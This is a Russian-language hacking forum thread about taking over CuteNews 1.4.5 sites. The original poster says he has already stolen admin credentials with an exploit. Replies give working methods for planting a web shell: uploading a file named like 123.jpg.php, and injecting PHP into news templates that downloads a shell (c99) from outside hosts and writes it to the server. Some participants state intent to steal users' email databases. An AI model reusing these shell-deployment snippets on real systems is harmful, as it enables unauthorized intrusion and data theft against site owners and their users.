CuteNews 1.4.5 help

Discussion in 'Песочница' started by 6u4yxa, 1 Apr 2008.

  1. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте товарисчи !
    С толкнулся с такой проблемой. Пробежавшись по сайтам нашел сплойт на 1,4,5 выдернул акк и пароль на админку, проверил - входит.
    Опять полез по просторам искать возможность залить шел на сервак- в итоге попал сюда =) ибо не че путного не нашел.
    Хотел спросить знающих, какие способы есть заливки шела имея админа в 1,4,5 ? (Желательно если такое возможно с пояснениями)
    И сразу же не отходя ещё вопрос по шелу- есть шел с функциями удаления файлов на удаленной машине, открытие cmd?

    З.Ы. Убедительная просьба не отправлять на поиск т.к. там все не то что надо, либо для cutenews расписано в 2 строчки что приводик к замешательству...
     
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Там можно залить картинку в виде 123.jpg.php а также евалить код в шаблонах. как сделать второе - догадайся сам.
     
  3. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Про 1:
    а можно поподробней про 123.jpg.php . (попробовал залить через админку пишет такой тип файлов не поддерживается)

    2:
    Я пробывал вставлять на прямую пхп код, но он не выводит его... тоесть вообще не воспринимает.
    а по поводу евалить ? - оно ?
    <?php eval(GET['путь до шела/shell.php']) ?> - тоесть с помощью этой строчки загрузиться мой шелл ?
     
    #3 6u4yxa, 2 Apr 2008
    Last edited: 2 Apr 2008
  4. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    нашел на секьюритилаб
    Прошелся 100 раз по всем трем пунктам =) результата 0 =) хостер (в локалке сервак) выдает:

    Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\appserv\htdocs\inc.php on line 1

    Warning: include(http://ip(там где картинка)/cute/data/upimages/image.gif) [function.include]: failed to open stream: no suitable wrapper could be found in C:\appserv\htdocs\inc.php on line 1

    Warning: include() [function.include]: Failed opening 'http://ip(там где картинка)/cute/data/upimages/image.gif' for inclusion (include_path='.;C:\appserv\php\pear\') in C:\appserv\htdocs\inc.php on line 1

    З.Ы. в пхп.ини include = on fopen = on
     
  5. zythar

    zythar Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    517
    Likes Received:
    109
    Reputations:
    5
    попроси админа сделать URL file-access enabled. то что include=on и fopen=on не имеет значения. тебе сказано в чем проблема
     
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    пробуй eval'ить код
    PHP:
    $data=@implode('',file('http://toxa.nov.ru/z.txt'));
    $fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp);
    или просто форму для загрузки сделай и через неё грузи шелл
     
    _________________________
    #6 +toxa+, 2 Apr 2008
    Last edited: 2 Apr 2008
    1 person likes this.
  7. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    C URL file-access enabled - меня побрили без указания причин =)
    Есть какие нить варианты, как залить шелл имея админку в cutenews ?
     
  8. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Когда через админку вставляю в темплейты любой пхп код, то он не как не всопринимается.
     
  9. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
    Code:
    $allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");
    
    [...]
    
    for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
         $current_image = 'image_'.$image_i;
    
         $image = $_FILES[$current_image]['tmp_name'];
         $image_name = $_FILES[$current_image]['name'];
         $image_name = str_replace(" ", "_", $image_name);
    
         $img_name_arr = explode(".",$image_name);
         $type = end($img_name_arr);
    
    
         if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
         elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
         elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
                   $img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
         }
         else{  //Image is OK, upload it
     
    3 people like this.
  10. ac1D

    ac1D Elder - Старейшина

    Joined:
    14 Mar 2007
    Messages:
    107
    Likes Received:
    18
    Reputations:
    1
    а если у меня в разделе статистика, в аттопроверке системы все поставлено на NO, точ то с этим можно сделать...?
    а при попытке залить картинку, пишет
     
  11. AseRTin

    AseRTin New Member

    Joined:
    27 May 2008
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    тему АП ;)

    хм... спойт как я понимаю этот: http://milw0rm.com/exploits/4779
    куда ты там свою переделку запихал???

    p.s. в наличии 4 сайта с такойже проблемой.... хочется стянуть базу мыл...
     
  12. antarius

    antarius New Member

    Joined:
    2 Jul 2008
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    да такая же проблема шелл не залит в 1.4.5 думаем как картинками не идёт тупо орткрывается страница шелла и написано изображения хз чё думать подскажите чё)
     
  13. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Вобщем допись

    PHP:
    HTML;
    $data=implode('',file('http://сай_дошела.ru/shell.php')); 
    $fp=fopen('./sh.php','wb');
    fputs($fp,$data);
    fclose($fp); 
    Создает в папке news как видите файл sh.php, это и есть ваш шел :)
    Работает 100% проверял на многих...
    Удачи.


    P.S. Только незабудьте удалить абсолютно все пробелы ;)
     
    #13 DJ ][akep, 9 Nov 2008
    Last edited: 9 Nov 2008
  14. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Постить сюда второй разне буду....
    Может поможешь?
    Как раз проблема с пробелами(((((
    https://forum.antichat.ru/showthread.php?p=941013#post941013
     
  15. DanST

    DanST New Member

    Joined:
    23 May 2007
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -12
    Дайте мне сам сплойт =)
     
  16. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Поиск для кого придуман?
     
  17. DanST

    DanST New Member

    Joined:
    23 May 2007
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -12
    хз
    а милворм не пашет
     
  18. korp

    korp New Member

    Joined:
    26 Sep 2008
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    Если ресурс малопосещяем то просто в шаблоны всунь код шела или форму загрузки и с помощью её залей шелл.
     
  19. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на

    HTML;
    $file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
    $brd = fopen('shell99.php','w+');
    $write = fwrite($brd, $file);

    ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
     
  20. Calypso

    Calypso Member

    Joined:
    27 Apr 2009
    Messages:
    453
    Likes Received:
    14
    Reputations:
    10
    вот что получается Warning: file_get_contents(http://suchechka.freehostia.com/c99.txt) [function.file-get-contents]: failed to open stream: Permission denied in /usr/home/hosting/esport/ogel2008/admin/data/Default.tpl on line 5